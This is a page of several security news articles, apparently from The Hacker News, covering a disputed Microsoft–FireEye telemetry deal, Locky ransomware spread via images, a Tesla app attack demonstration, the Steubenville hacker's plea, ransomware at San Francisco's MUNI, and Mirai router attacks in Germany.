Microsoft Shares Telemetry Data Collected from Windows 10 Users with 3rd-Party

Cyber security is a major challenge in today's world, as cyber attacks have become more automated and difficult to detect, where traditional cyber security practices and systems are no longer sufficient to protect businesses, governments, and other organizations.

In past few years, Artificial Intelligence and Machine Learning had made a name for itself in the field of cyber security, helping IT and security professionals more efficiently and quickly identify risks and anticipate problems before they occur.

The good news is that if you are a Windows 10 user, Microsoft will now offer you a machine learning based threat intelligence feature via its inbuilt Windows security service, which will improve the security capabilities available on Windows 10 devices.

But, the bad news is that it is not free.

The company is offering this "differentiated intelligence" feature on its newly added service to Windows 10, dubbed Windows Defender Advanced Threat Protection (WDATP), which helps enterprises detect, investigate, and respond to advanced attacks on their networks.

This becomes possible after Microsoft recently signed a deal with FireEye that integrates the security vendor's iSIGHT Threat Intelligence into Windows Defender Advanced Threat Protection.

As part of the partnership, Microsoft will give FireEye access to all the telemetry data from every device running Windows 10, Australian website ARN reports.

"FireEye has invested in nation-state grade threat intelligence, and we are strategically partnering with industry leaders to operationalize this high-quality intel," Ken Gonzalez, FireEye's Vice President of Corporate Development, said in the official press release.

"By working with Microsoft, we’re able to offer differentiated threat intelligence within WDATP and together help make organizations more secure."

Update: Microsoft denies the claims, saying that the deal does not include any sharing of Microsoft telemetry with FireEye. Here's the official statement provided by a Microsoft Spokesperson to The Hacker News:

"The nature of the deal between Microsoft and FireEye is to license threat intelligence content from FireEye iSIGHT Intelligence. This additional layer of intelligence includes indicators and reports of past attacks collected and edited by FireEye and enhances detection capabilities of Windows Defender Advanced Threat Protection (WDATP). The deal does not include the sharing of Microsoft telemetry."

It's no secret that Windows 10 collects all sorts of usage information on users and sends them back to Microsoft, which then uses this telemetry data to help identify security issues, fix problems and improve the quality of its operating system.

This telemetry data includes information on the device running Windows 10, a list of installed apps, crash dumps, and other statistics from devices powered by its latest operating system.

However, this Microsoft's data mining capability also raised some privacy concerns among Windows users.

This newly-signed deal with FireEye is the first time that Microsoft has publicly agreed to share telemetry data of Windows 10 users with a third-party, which is definitely worrying for many users.

At this moment, the official press release says nothing about Microsoft providing FireEye with access to data collected from Windows 10 users.

Microsoft has yet to comment on this matter.

Read More

Beware! Malicious JPG Images on Facebook Messenger Spreading Locky Ransomware

If you receive an image file sent by someone, even your friend, on your Facebook Messenger, LinkedIn or any other social media platform, just DO NOT CLICK ON IT.

Even JPG image file could eventually infect your computer with the infamous Locky Ransomware.

Earlier this week, i reported a new attack campaign that used Facebook Messenger to spread LockyRansomware via .SVG image files, although Facebook denied this was the case.

Now, researchers have discovered that the ongoing spam campaign is also using boobytrapped .JPG image files in order to download and infect users with the Locky Ransomware via Facebook, LinkedIn, and other social networking platforms.

Security researchers from Israeli security firm Check Point have reportedly discovered how cyber criminals are hiding malware in image files, and how they are executing the malware code within these images to infect social media users with Locky variants.

According to researchers, malware authors have discovered security vulnerabilities in the Facebook and LinkedIn that forcibly download a maliciously coded image file on a user's computer, though in some cases, the user has to click on the image file to download.

When the user detect the automatic download and access that malformed image file, malicious code installs the Locky ransomware onto the user's computer, which encrypts all files on the infected computer until a ransom is paid.

Flaws in Facebook and LinkedIn Remain Unpatched

The security firm has declined to provide technical details as the vulnerability the malware relies on still impacts both Facebook and LinkedIn, among other unnamed web services.


"The attackers have built a new capability to embed malicious code into an image file and successfully upload it to the social media website," Check Point researchers say.

"The attackers exploit a misconfiguration on the social media infrastructure to deliberately force their victims to download the image file. This results in infection of the users' device as soon as the end-user clicks on the downloaded file."

CheckPoint says the firm reported the issue to both  Facebook and LinkedIn back in September, but the vulnerabilities remain unpatched in both the platform, which is now actively being exploited by attackers.

Video Demonstration of the Attack

You can also watch the video demonstration of this attack, which CheckPoint dubbed ImageGate, which shows the attack in action.

Locky is Spreading Massively via Social Media Platform

Locky ransomware has been around since early this year and has become the biggest and most common ransomware family known today. It works by encrypting victims' files with RSA-2048 and AES-1024 algorithms and demands a ransom for the key.

Locky ransomware mainly spreads via phishing emails containing a malicious attachment disguised as a Word or Zip file. But since people spend time on social network sites, cyber crooks have turned their focus to finding a way into these platforms.

Check Point says that in the past week, they have noticed a "massive spread of the Locky ransomware via social media, particularly in its Facebook-based campaign."

To keep yourself safe, you are advised not to open any unsolicited file that has automatically downloaded onto your computer, especially image files with unusual extensions like SVG, JS, or HTA.

The bottom line: Don't be curious to look at image sent by someone, at least for the time being.

Read More

Researchers Show How to Steal Tesla Car by Hacking into Owner's Smartphone

New technology is always a little scary, so are Smart Cars. From GPS system and satellite radio to wireless locks, steering, brakes, and accelerator, today vehicles are more connected to networks than ever, and so they are more hackable than ever.

It's not new for security researchers to hack connected cars. Previously they had demonstrated how to hijack a car remotely, and how to disable car's crucial functions like airbags by exploiting security bugs affecting significant automobiles.

Now this time, researchers at Norway-based security firm Promon have demonstrated how easy it is for hackers to steal Tesla cars through the company's official Android application that many car owners use to interact with their vehicle.

Two months ago, Chinese security researchers from Keen Lab managed to hack a Tesla Model S, which allowed them to control a car in both Parking and Driving Mode from 12 miles away.

However, Promon researchers have taken an entirely different approach.

Tesla Stores OAuth Token in Plaintext

The researchers infected a Tesla owner's phone with Android malware by compromising the Tesla's smartphone app, allowing them to locate, unlock and drive away with a Tesla Model S.

However, Tesla has clarified that the vulnerabilities used in the latest attack do not reside in its app, rather the attack employed known social engineering techniques that trick people into installing malware on their Android devices, which compromise their entire phone and all apps, including Tesla app.

In a blog post, Promon researchers explained that Tesla app generates an OAuth token when a Tesla owner log in to the Android app for the first time. The app then uses this token, without requiring the username and password every time the owner re-opens the app.

This OAuth token is then stored in plain text into the device’s system folder which can be accessed by privileged root user only.

Researchers Demonstrates How to Steal a Tesla Car:

According to researchers, it is easy for an attacker to develop a malicious app that contains Android rooting exploits such as Towelroot and Kingroot, which can then be used to escalate the malicious app's privileges, allowing attackers to read OAuth token from the Tesla app.

Stealing this token could enable an attacker to locate the car and open its doors, but could not help the attacker start and drive away with the owner's car.

For this, the malware needs to delete the OAuth token from the owner's phone, which prompts the owner to enter his/her username and password again, allowing the attacker to collect the owner's login credentials.

Researchers say this can be done by modifying the original Tesla app's source code. Since the malware has already rooted the owner's smartphone, it can alter the Tesla app and send a copy of the victim's username and password to the attacker.

With this data, the attacker can perform a series of actions, like locating the car on the road, open its doors, start the car's motor and drive the car away unhindered, just by sending well-crafted HTTP requests to the Tesla servers with the owner's OAuth token and password.

Tesla says it is not the issue with its product but common social engineering tricks used by attackers to first compromise victim's phone, rooting the device and then altering its apps data.

The researchers' attack is only possible when an attacker convinces a victim into downloading a malicious app on his/her Android device.

Read More

Hacker who exposed Steubenville Rape Faces longer Prison term than Rapists

Remember Steubenville High School Rape Case?

In 2012, Steubenville (Ohio) high school's football team players gang-raped an unconscious teenage girl from West Virginia and took photographs of the sexual assault.

In December 2012, a member of the hacker collective Anonymous hacked into the Steubenville High School football fan website Roll Red Roll and leaked some evidence of the rape, including a video taken and shared by the crime's perpetrators in which they joked about the sexual assault.

The hack exposed information about the gang rape by two football team players — Trent Mays and Ma’lik Richmond, both 16 at the time of the crime — who were eventually convicted and sentenced in 2013 to 2 and one years behind bars, respectively, but have since been released.

In 2013, the FBI raided the home of Deric Lostutter — Anonymous member, also known online as "KYAnonymous" — and seized two laptops, flash drives, CD's, an external hard-drive, cell phones and an XBox, and arrested him.

Lostutter, a 29-year-old man from Winchester, pleaded guilty in federal court in Kentucky on Wednesday to one count of conspiring to illegally break into the computers to draw attention to the Steubenville rape case without authorization and one count of lying to an FBI agent.

What's weird? The hacker is facing a longer prison term than the rapists.

Lostutter said he hacked into the site with just an intention to expose information about the gang rape. He said in court Wednesday, "We wanted to stand up for a girl who had no voice, and we went about it the wrong way," according to WTVQ.

However, prosecutors alleged that Lostutter participated in an online campaign against the school in late 2012 under the banner of Anonymous. They also said Lostutter used the online alias KYAnonymous to conspire online with other hacktivists in December 2012.

According to prosecutors, the goal was to intimidate and harass an individual who ran Roll Red Roll, the website dedicated to the football team. Lostutter gained unauthorized access to the target's website and leaked its owner's personal emails online.

There's no doubt that the operation against the school website helped bring the Steubenville rape case into the national spotlight. But Lostutter was questioned over his participation after the campaign got off the ground.

"Lostutter filmed a video wearing a mask and wrote a manifesto, which was both posted on the website to harass and intimidate people, and to gain publicity for Lostutter and [Noah] McHugh's online identities," said the protectors.

"Specifically, the messages threatened to reveal personal identifying information of Steubenville High School students, and made false claims that the administrator of the fan website was involved in child pornography and directed a 'rape crew.'"

Lostutter faces a maximum sentence of 10 years in prison and $250,000 in fines. He is scheduled to appear before the judge for sentencing on March 8, 2017. His defense did not comment on the plea agreement.

Noah McHugh, co-conspirator of Lostutter, was pleaded guilty in September to hacking the Steubenville website. He is slated to be sentenced in December.

Read More

San Francisco Metro System Hacked with Ransomware; Resulting in Free Rides

Nothing is immune to being hacked when hackers are motivated.

The same proved by hackers on Friday, when more than 2,000 computer systems at San Francisco's public transit agency were apparently got hacked.

San Francisco's Municipal Transportation Agency, also known as MUNI, offered free rides on November 26th after MUNI station payment systems and schedule monitors got hacked by ransomware and station screens across the city started displaying a message that reads:

"You Hacked, ALL Data Encrypted. Contact For Key(cryptom27@yandex.com)ID:681 ,Enter."

According to the San Francisco Examiner, MUNI confirmed a Ransomware attack against the station fare systems, which caused them to shut down ticket kiosks and make rides free this weekend.

As you can see, the above message delivered by the malware followed by an email address and ID number, which can then be used to arrange ransom payments.

MUNI Spokesman Paul Rose said his agency was investigating the matter and "working to resolve the situation," but did not provide details as of how MUNI got hacked.

"We are currently working to resolve the situation," said Rose. "There is an ongoing investigation, and it wouldn’t be appropriate to provide additional details."

Trains themselves were not affected by the malware attack, and the MUNI claimed that the payments were resumed on the morning of November 27th. The MUNI looks after trains, trams and buses around the city, including San Francisco's iconic cable cars.

It is yet not clear exactly who was responsible for the attack (besides a pseudonym "Andy Saolis"), but according to local media reports, the agency's computers were being held by ransomware until the MUNI paid the equivalent of more than $73,000 in Bitcoin.

Andy Saolis is a pseudonym commonly used in HDDCryptor ransom attacks, which uses commercial tools to encrypt hard drives and network shares on Windows machines using randomly generated keys and then overwrite the hard disks' MBRs to prevent systems from booting up properly.

The target machine is typically infected by accidentally opening a malicious executable in an email or download, and then the malware spreads out across the network.

The email address, cryptom27@yandex.com, used by anonymous criminal points the city to a Russian email address to arrange payment and has been linked to other cyber attacks as well.

The Hacker Linked to a Previous Ransomware Starin

When reaching at the provided email, the hacker provided a statement in broken English, which read:

"We don't attention to interview and propagate news! Our software working completely automatically and we don't have targeted attack to anywhere! SFMTA network was Very Open and 2000 Server/PC infected by software! So we are waiting for contact any responsible person in SFMTA but I think they don't want deal ! so we close this email tomorrow!"

The same email address, cryptom27@yandex.com, was linked to a ransomware strain called Mamba in September. The ransomware employs tactics similar to those demonstrated against the MUNI systems.

The hacker provided hoodline a list of systems the hacker claimed to have infected in Muni's network, which came out to be 2,112 of the total 8,656 computer networks. The hacker also said that the MUNI had "one more day" to make a deal.

Not much about the hack is known; the extent of the hack and hacker's identity remain a mystery for now, but the incident once again reminds us that how vulnerable our critical infrastructure remains.

Read More

Cyber Attack Knocks Nearly a Million Routers Offline

Mirai Botnet is getting stronger and more notorious each day that passes by. The reason: Insecure Internet-of-things Devices.

Last month, the Mirai botnet knocked the entire Internet offline for a few hours, crippling some of the world's biggest and most popular websites.

Now, more than 900,000 broadband routers belonging to Deutsche Telekom users in Germany knocked offline over the weekend following a supposed cyber-attack, affecting the telephony, television, and internet service in the country.

The German Internet Service Provider, Deutsche Telekom, which offers various services to around 20 Million customers, confirmed on Facebook that as many as 900,000 customers suffered internet outages on Sunday and Monday.

Millions of routers are said to have vulnerable to a critical Remote code Execution flaw in routers made by Zyxel and Speedport, wherein Internet port 7547 open to receive commands based on the TR-069 and related TR-064 protocols, which are meant to use by ISPs to manage your devices remotely.

The same vulnerability affects Eir D1000 wireless routers (rebranded Zyxel Modem) deployed by Irish internet service provider Eircom, while there are no signs that these routers are actively exploited.

According to Shodan search, around 41 Million devices leave port 7547 open, while about 5 Million expose TR-064 services to the outside world.

According to an advisory published by the SANS Internet Storm Center, honeypot servers posing as vulnerable routers are receiving exploit code every 5-10 minutes for each target IP.

An intercepted packet showed how a remote code execution flaw in the <NewNTPServer> part of a SOAP request was used to download and execute a file in order to infect the vulnerable device.

Security researchers at BadCyber also analyzed one of the malicious payloads that were delivered during the attacks and discovered that the attack originated from a known Mirai's command-and-control server.

"The unusual application of TR-064 commands to execute code on routers has been described for the very first time at the beginning of November, and a few days later a relevant Metasploit module had appeared," BadCyber wrote in a blog post. "It looks like someone decided to weaponize it and create an Internet worm based on Mirai code."

It all started early October when a cyber criminal publicly released the source code of Mirai, a piece of nasty IoT malware designed to scan for insecure IoT devices – mostly routers, cameras, and DVRs – and enslaves them into a botnet network, which is then used to launch DDoS attacks.

The hacker created three separate exploit files in order to infect three different architectures: two running different types of MIPS chips and one with ARM silicon.

The malicious payloads open the remote administration interface and then attempt to log in using three different default passwords. After this is done, the exploit then closes port 7547 in order to prevent other attackers from taking control of the infected devices.

"Logins and passwords are obfuscated (or "encrypted") in the worm code using the same algorithm as does Mirai," the researchers say. "The C&C server resides under timeserver.host domain name, which can be found on the Mirai tracker list."

More in-depth technical details about the vulnerability can be found on ISC Sans, Kaspersky Lab, and Reverse Engineering Blog.

Deutsche Telekom has issued an emergency patch for two models of its Speedport broadband routers – Speedport W 921V, Speedport W 723V Type B – and currently rolling out firmware updates.

The company recommends its customers to power down their routers, wait for 30 seconds and then restart their routers in an attempt to fetch the new firmware during the bootup process.

If the router fails to connect to the company's network, users are advised to disconnect their device from the network permanently.

To compensate the downtime, the ISP is also offering free Internet access through mobile devices to the affected customers until the technical problem is resolved.

Read More